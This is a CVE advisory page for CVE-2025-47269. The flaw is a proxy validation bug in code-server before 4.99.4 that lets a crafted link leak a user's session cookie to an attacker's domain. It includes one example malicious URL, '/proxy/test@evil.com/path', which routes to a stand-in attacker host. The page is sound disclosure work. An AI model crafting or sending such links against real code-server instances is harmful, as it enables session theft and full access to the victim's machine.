CVE-2025-47269

  1. OpenCVE
  2. Vulnerabilities (CVE)
  3. CVE-2025-47269
code-server runs VS Code on any machine anywhere through browser access. Prior to version 4.99.4, a maliciously crafted URL using the proxy subpath can result in the attacker gaining access to the session token. Failure to properly validate the port for a proxy request can result in proxying to an arbitrary domain. The malicious URL `https://<code-server>/proxy/test@evil.com/path` would be proxied to `test@evil.com/path` where the attacker could exfiltrate a user's session token. Any user who runs code-server with the built-in proxy enabled and clicks on maliciously crafted links that go to their code-server instances with reference to /proxy. Normally this is used to proxy local ports, however the URL can reference the attacker's domain instead, and the connection is then proxied to that domain, which will include sending cookies. With access to the session cookie, the attacker can then log into code-server and have full access to the machine hosting code-server as the user running code-server. This issue has been patched in version 4.99.4.

8.3 /10

CVSS v3 : HIGH

V3 Legend

Vector :

Exploitability : 2.8 / Impact : 5.5

Attack Vector NETWORK

Attack Complexity LOW

Privileges Required NONE

User Interaction REQUIRED

Confidentiality Impact HIGH

Integrity Impact HIGH

Availability Impact LOW

Scope UNCHANGED

References
Link Resource
https://github.com/coder/code-server/commit/47d6d3ada5aadef6d221f3d612401eb3dad9299e
https://github.com/coder/code-server/releases/tag/v4.99.4
https://github.com/coder/code-server/security/advisories/GHSA-p483-wpfp-42cj
Configurations

No configuration.

History

12 May 2025, 17:32

Type Values Removed Values Added
Summary
  • (es) Code-server ejecuta VS Code en cualquier máquina, desde cualquier lugar, mediante acceso al navegador. Antes de la versión 4.99.4, una URL maliciosa que usara la subruta del proxy podía permitir que un atacante obtuviera acceso al token de sesión. Si no se valida correctamente el puerto para una solicitud de proxy, se puede redirigir a un dominio arbitrario. La URL maliciosa «https:///proxy/test@evil.com/path» se redirigía a «test@evil.com/path», donde el atacante podría extraer el token de sesión de un usuario. Cualquier usuario que ejecute Code-server con el proxy integrado habilitado haga clic en enlaces maliciosos que dirijan a sus instancias de Code-server con referencia a /proxy. Normalmente, esto se utiliza para redirigir puertos locales; sin embargo, la URL puede hacer referencia al dominio del atacante, y la conexión se redirige a ese dominio, lo que incluye el envío de cookies. Con acceso a la cookie de sesión, el atacante puede iniciar sesión en el servidor de código y tener acceso completo a la máquina que lo aloja como el usuario que lo ejecuta. Este problema se ha corregido en la versión 4.99.4.

09 May 2025, 21:15

Type Values Removed Values Added
New CVE
Information

Published : 2025-05-09 21:15

Updated : 2025-05-12 17:32

NVD link : CVE-2025-47269

Mitre link : CVE-2025-47269

CVE.ORG link : CVE-2025-47269

JSON object : View

Products Affected

No product.

CWE
CWE-441

Unintended Proxy or Intermediary ('Confused Deputy')